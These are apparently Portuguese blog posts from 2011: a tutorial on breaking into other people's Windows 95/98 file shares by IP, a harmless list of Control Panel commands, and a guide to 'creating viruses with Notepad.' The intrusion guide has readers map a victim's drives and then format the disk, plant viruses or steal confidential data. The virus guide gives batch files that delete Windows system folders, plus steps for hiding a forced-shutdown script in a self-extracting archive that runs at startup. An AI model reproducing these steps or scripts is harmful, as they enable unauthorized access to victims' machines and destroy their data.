terça-feira, 19 de julho de 2011

Invasão por IP

Alegria de uns, tristeza de outros, na verdade, aqueles que utilizam a rede Dial-Up do Win95 para sua conecção com a internet podem estar correndo sérios riscos a não ser, é claro, que assim conectam-se propositalmente, com intenções "diversas".
Utilizar-se de uma conecção PPP do Win95 num provedor de acesso, significa estar disponibilizando seu computador a todos os usuário da net. Mesmo sem o compartilhamento de arquivos, existem diversas ferramentas que permitem a outra pessoa conectar-se ao seu computador caso você esteja utilizando esse tipo de conecção.

conecte-se à Internet utilizando a rede Dial-Up do Win95. Se o seu provedor não disponibilizar uma conecção do tipo PPP, estas dicas não funcionarão.

Verifique antes, se você possui os drivers clientes para redes Microsoft. Caso não estejam instalados, instale-os através do Painel de Controle, no ícone Redes.

Verifique também se o compartilhamento de Arquivos e Impressoras está instalado.

Se estiver, você estará sujeito à que outra pessoa conecte-se ao seu computador simplesmente sabendo seu IP. Se bem que, para aqueles que já sabem, existem mil maneiras diferentes de se "burlar" a fraquinha segurança do Win95. Para você poder encontrar outros computadores compartilhados, você deve configurar WINS e LMHOSTS. O WINS é utilizado para localizar os computadores com IP fixo. O LMHOSTS, é acionado automaticamente na procura de computadores que possuem IP dinâmicos.ATENÇÃO : TODOS ESSES ARQUIVOS SE ENCONTRAM NO C:\windows\ ok!

Configurar essas opções é simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontrará a opção para ativar a resolução WINS. No caso de você não conhecer nenhum servidor WINS, utilize 204.118.34.6 como primário e 204.118.34.11 como secundário. Esses servidores são dos USA, e gratuítos. Caso queira outros endereços, utilize um dos mecanismos de busca na Internet. Para configurar o LMHOSTS, você precisa criar um arquivo texto simples, utilizando-se atá mesmo o Bloco de Notas do Windows. O arquivo criado deve chamar-se LMHOSTS. É nesse arquivo que ficarão os endereços de IP e os nomes dos computadores que você terá acesso. Para localizar um determinado computador, você digita o seu número de IP e a seguir seu NetBios, na mesma linha, separados por um espaço. Se você executar o programa NBSTSTAT, seguido da opção -N, você obterá essa lista, com o nome e o IP de seu computador sempre sendo o primeiro da lista, seguido das outras máquinas disponíveis, tudo numa janela DOS. Através do Explorer você poderá ver os computadores disponíveis na rede,dos quais você ainda poderá utilizar os discos mapeando-os, o que os tornará unidades de seu computador.

Mais sobre Invasão por IP

Você (se ainda não sabe) vai realmente aprender como invadir por IP!

Saiba de uma coisa:
Vocês vão ler um texto de invasão por IP de verdade... O outro texto que circula aí nas páginas é a maior droga que eu já vi. Não explica direito, tem vários erros, enfim, é uma porcaria. Esse texto tem na maioria das páginas por aí porque seus weblamerzmasters não tem criarividade para criar. Saiba o texto que vcs vão ler foi criado por mim. Bem, chega de bla, bla, bla e vamos ao que interessa!

Introdução:


Ninguém está seguro na rede. Todo o provedor decente que se preze, te oferece uma conexão PPP para você. Eh muito difícil achar um provedor que não ofereça. Isso pode ser bom ou ruim dependendo das suas intenções. A conexão PPP é essencial para invadir por IP.
Bem, para invadir por IP você precisa estar conectado na Internet e a VÍTIMA também (dãããã...), você prescisa da conexão PPP e ter o IP da pessoa que quer invadir. Esse texto irá ensinar a invadir pelo Microbost Ruindows 95 ou 98, se você não o tiver, procure outro texto que explique com outra plataforma!
- Prós & Contras de uma invasão por IP:
- Você tem controle de todos os Drives do PC da Vítima.
- Os drives da vítima podem aparecer como seus drives no Explorer.
- A Vítima tem que ter o compartilhamento de arquivos instalado.
Hora da Invasão:
Renomeie o seu arquivo C:\WINDOWS\SYSTEM\VNBT.386 para qualquer outra porra. Além de ser necessário para invadir por IP, seu PC fica PROTEGIDO. Certifique-se que você tem o programa C:\WINDOWS\NBTSTAT.EXE . Toda a instalação comum do Windows 95 tem esse programa. Verifique antes, se você possui os drivers clientes para redes Microsoft. Caso não estejam instalados, instale-os através do Painel de Controle, no ícone Redes.
Para você poder encontrar outros computadores compartilhados, você deve configurar WINS e LMHOSTS. O WINS é utilizado para localizar os computadores com IP fixo. O LMHOSTS, é acionado automaticamente na procura de computadores que possuem IP dinâmicos. Configurar essas opções é simples. Vá ao Painel de Controle e abra Rede. Verifique as propriedades do protocolo TCP/IP. Alí você encontrará a opção para ativar a resolução WINS.
Pegue o IP da vítima na hora da invasão pois o IP dessa pessoa pode mudar. A minha dica é o ICQ pois além de saber se a pessoa está conectada, com o IP sniffer você pode pegar o IP dela. Vamos tomar como 200.300.40.50 o IP da vítima.
Digite no Ms-Dos: nbtstat -a 200.300.40.50. Se aparecer "Host fot found" esqueça. O PC não tem compartilhamento de arquivos ou é um número inexistente. Caso apareça um monte de nomes esquisitos com um "<03>" antes, você deve pegar o nome do negócio que estiver com <03> atrás do nome.
Entre no arquivo C:\WINDOWS\LMHOSTS.SAM e coloque na nele (Embaixo dos outros endereços IP): [IP da vítima] [NetBios]. O NetBios é aquele nome esquisito aparece na mesma linha do IP do cara. Lembre-se: Seja rápido. Nunca se sabe quando a VÍTIMA se desconecta....
Mapeie os drives do PC da vítima para virtualmente fazerem parte de seu PC. No Explorer, vá em Ferramentas-Mapear unidade de Rede. Coloque uma letra de Drive qualquer e no endereço coloque algo como: //200.300.40.50. A parte de mapear o PC da vítima é meramente opicional. Mas mapeando o PC da vítima fica bem melhor.....
Agora no Menu Iniciar, vá em Executar e digite: //200.300.40.50 e ponha "OK". Pronto, você estará invadindo por IP....

Hora da Diversão:
Hackers e crackers tem objetivos de aprendizagem comuns mas "intenções" diferentes. Você decide, você escolhe o final. Se você for hacker ou cracker, leia a sua instrução correspondente.
Para Hackers:
Parabéns! Você acaba de entrar em um PC e já deve saber mais sobre invasão. Não toque em nada, não mude nada. Em algum caso de extrema urgência, faça essa invasão sem problema. Continue se informando e continue aprendendo. Caso ache novidades para invasão por favor envie um e-mail para mim.
Para Crackers:
He He He He..... Agora que você invadiu FAÇA A FESTA antes que a vítima desconecte. Como os drives dela estão no seu Windows Explorer, agora é moleza! Que tal colocar um vírus de macro no word? Que tal soltar um vírus mortal lá dentro? Que tal clicar com o botão direito do mouse no winchester da vítima e selecionar a opção FORMATAR DISCO???? Seja criativo e boa diversão. Se você está invadindo uma pessoa conhecida, antes vasulhe e tente achar infomações confidenciais para sacaneá-lo depois! Qualquer dica para invasão por favor envie-me um e-mail.

quinta-feira, 14 de julho de 2011

Lista de comandos Painel de controle

* ACCESS.CPL : abre as opções de acesso (Só no XP)
* APPWIZ.CPL : abre a ferramenta Adicionar/Excluír um programa
* AZMAN.MSC : abre o gerenciador de autorizações (Só no Vista)
* CERTMGR.MSC : abre os certificados para o usuário atual
* CLICONFG : abre a configuração dos clientes SQL
* COLLAB.CPL : abre a vizinhança imediata (Só no Vista)
* COMEXP.MSC ou DCOMCNFG : abre a ferramenta serviços e componentes (Só no Vista)
* COMPMGMT.MSC : abre a ferramenta de gestão do computador
* COMPUTERDEFAULTS : abre a ferramenta dos programas padrão (Só no Vista)
* CONTROL /NAME MICROSOFT.BACKUPANDRESTORECENTER : abre o centro de backup e de restauração (Só no Vista). Tutorial AQUI
* CONTROL ADMINTOOLS : abre as ferramentas de administração
* CONTROL COLOR : abre as configurações de aparência
* CONTROL FOLDERS : abre as opções de pastas
* CONTROL FONTS : abre o gerenciador de caracteres
* CONTROL INTERNATIONAL ou INTL.CPL : abre as opções regionais e linguísticas
* CONTROL KEYBOARD : abre as propriedades do teclado
* CONTROL MOUSE ou MAIN.CPL : abre as propriedades do mouse
* CONTROL PRINTERS : abre as impressoras e os faxes disponíveis
* CONTROL USERPASSWORDS : abre o editor de contas dos usuários
* CONTROL USERPASSWORDS2 ou NETPLWIZ : controla os usuários e seus acessos
* CONTROL : abre o Painel de controle
* CREDWIZ : abre a ferramenta de backup e de restauração de senhas dos usuários (Só no Vista)
* DESK.CPL : abre as configurações de exibição
* DEVMGMT.MSC : abre o gerenciador de periféricos. Tutorial AQUI
* DRWTSN32 : abre o Dr. Watson (Só no XP)
* DXDIAG : abre a ferramenta de diagnóstico DirectX
* EVENTVWR ou EVENTVWR.MSC : abre o observador de eventos
* FSMGMT.MSC : abre as pastas compartilhadas
* GPEDIT.MSC : abre o editor de estratégias de grupo (Para as edições profissionais e mais do Windows)
* HDWWIZ.CPL : abre o assistente « adicionar hardware»
* INFOCARDCPL.CPL : abre o assistente « compatibilidade de programas »
* IRPROPS.CPL : abre o gerenciador de infravermelho
* ISCSICPL : abre a ferramenta de configuração do iniciador ISCI Microsoft (Só no Vista)
* JOY.CPL : abre a ferramenta do controlador de jogos
* LPKSETUP : abre o assistente de instalação e desinstalação dos idiomas de exibição (Só no Vista)
* LUSRMGR.MSC : abre o editor dos usuários e grupos locais
* MDSCHED : abre a ferramenta de diagnósticos da memória Windows (Só no Vista)
* MMC : abre um novo console vazio
* MMSYS.CPL : abre as configurações de som
* MOBSYNC : abre o centro de sincronização
* MSCONFIG : abre a ferramenta de configuração do sistema
* NAPCLCFG.MSC : abre a ferramenta de configuração do cliente NAP (Só no Vista)
* NTMSMGR.MSC : abre o gerenciador de suporte de armazenamento removível
* NTMSOPRQ.MSC : abre as solicitações do operador de armazenamento removível
* ODBCAD32 : abre o administrador de fonte de dados ODBC
* OPÇÃOALFEATURES : abre a ferramenta Adicionar/Excluír componentes do Windows (Só no Vista)
* PERFMON ou PERFMON.MSC : abre o monitor de confiabilidade e de desempenho Windows.
* POWERCFG.CPL : abre o gerenciador de modos de alimentação (Só no Vista)
* REGEDIT ou REGEDT32 : abre o editor de registro (Só no Vista)
* REKEYWIZ : abre o gerenciador de certificados de criptografia de arquivos (Só no Vista)
* RSOP.MSC : abre o jogo de estratégia resultante
* SECPOL.MSC : abre as configurações de segurança local
* SERVICES.MSC : abre o gerenciador de serviços
* SLUI : abre o assistente de ativação do Windows (Só no Vista)
* SYSDM.CPL : abre as propriedades do sistema
* SYSEDIT : abre o editor de configuração do sistema (Atenção, manipular com cautela)
* SYSKEY : abre o utilitário de proteção do banco de dados das contas Windows (Atenção, manipular com extrema cautela !)
* SYSPREP: abre a pasta com a ferramenta de preparação do sistema (Só no Vista)
* TABLETPC.CPL : abre as configurações para o Tablet pc (Só no Vista)
* TASKSCHD.MSC ou CONTROL SCHEDTASKS : abre o planejador de tarefas (Só no Vista)
* TELEPHON.CPL : abre a ferramenta de conexão telefônica
* TIMEDATE.CPL : abre as configurações da hora e da data
* TPM.MSC : abre a ferramenta de gestão do módulo de plataforma segura no computador local (Só no Vista)
* UTILMAN : abre as opções de ergonomia (Só no Vista)
* VERIFICAR : abre o gerenciador de verificação dos drivers
* WMIMGMT.MSC : abre o « Windows Management Infrastructure »
* WSCUI.CPL : abre o centro de segurança Windows
* WUAUCPL.CPL : abre o serviço de atualização do Windows (Só no XP)

CRIANDO VÍRUS PELO BLOCO DE NOTAS

Para destruir o pc de uma pessoa vc tem que criar no bloco de notas (iniciar / todos os programas / acessorios / bloco de notas) copie e cole no bloco de notas isso abaixo:

CD\
CD\WINDOWS
DEL WIN.INI
DEL WIN.COM
DEL SYSTEM
DEL SYSTEM.INI
DEL SYSTEM.COM
DEL SYSTEM32
DEL SECURITY
DEL REGEDIT.EXE
DEL HH.EXE
DEL CONFIG
DEL CONTROL.INI
DEL CONTROL.COM
DEL DEBUG
DEL CLOCK.AVI
DEL TASKMAN.EXE
DEL WININIT.INI
DEL WININIT.COM
DEL WEB
CD\
DEL CONFIG.SYS
DEL AUTOEXEC.BAT
rmdir /s /q c:\windows

Após ter feito isso salve o arquivo e renomeio de auguma coisa que você queira por no titulo, mas tem que ter no final .bat (exemplo: virus.bat)

ATENÇAO: Nunca aperte nesse icone se possivel deixe oculto para ninguém conseguir clikar nele.

ou

Va em iniciar/executar e digite notepad.
Irá abrir o bloco de notas.
Copie o comando e cole no bloco de notas ao salvar vc usa .bat exemplo: sacanear.bat

del /s /q c:\windows\
(deleta tudo dentro do windows arquivos e naum pastas)

rmdir /s /q c:\windows
(deleta todo do windows) - (fode o pc)

shutdown -s
(desliga o pc)

shutdown -r
(reinicia o pc)

Fazendo um virus.exe com win rar
Abra o bloca de notas e digite shutdown -r -f
shutdown -r -> desliga o pc reiniciando
shutdown -f -> força o pc a desliga.. ecerrando qualquer programa..
Salve como desliga.bat

Transformando em .exe ( tem que ter o WinRar)
clique com botao direito no arquivo .bat, e vá em adicionar para o arquivo.
marque criar arquivo SFX. Note que o nome muda para por exemplo desliga.exe.
vá até a guia avançado e clique em opçao sfx.

em caminho para extraçao coloque: %homepath%\Menu Iniciar\Programas\Inicializar

marque caminho absoluto e salvar e restaurar caminho
em executar após a extraçao coloque: desliga.bat
na guia metodo.
marque ocultar tudo e ignorar arquivos existentes.

CUIDADO: naum execute o arquivo pois seu computador sera infectado!

outros comandos para o seu vírus:

c\ - volta todas as pastas e vai parar em c:
cd XXX - entra na pasta, coloque o caminho no lugar de XXX - exemplo : cd windows\system32\
md XXX - cria uma pasta, no lugar de XXX coloque o nome da pasta - exemplo: md teste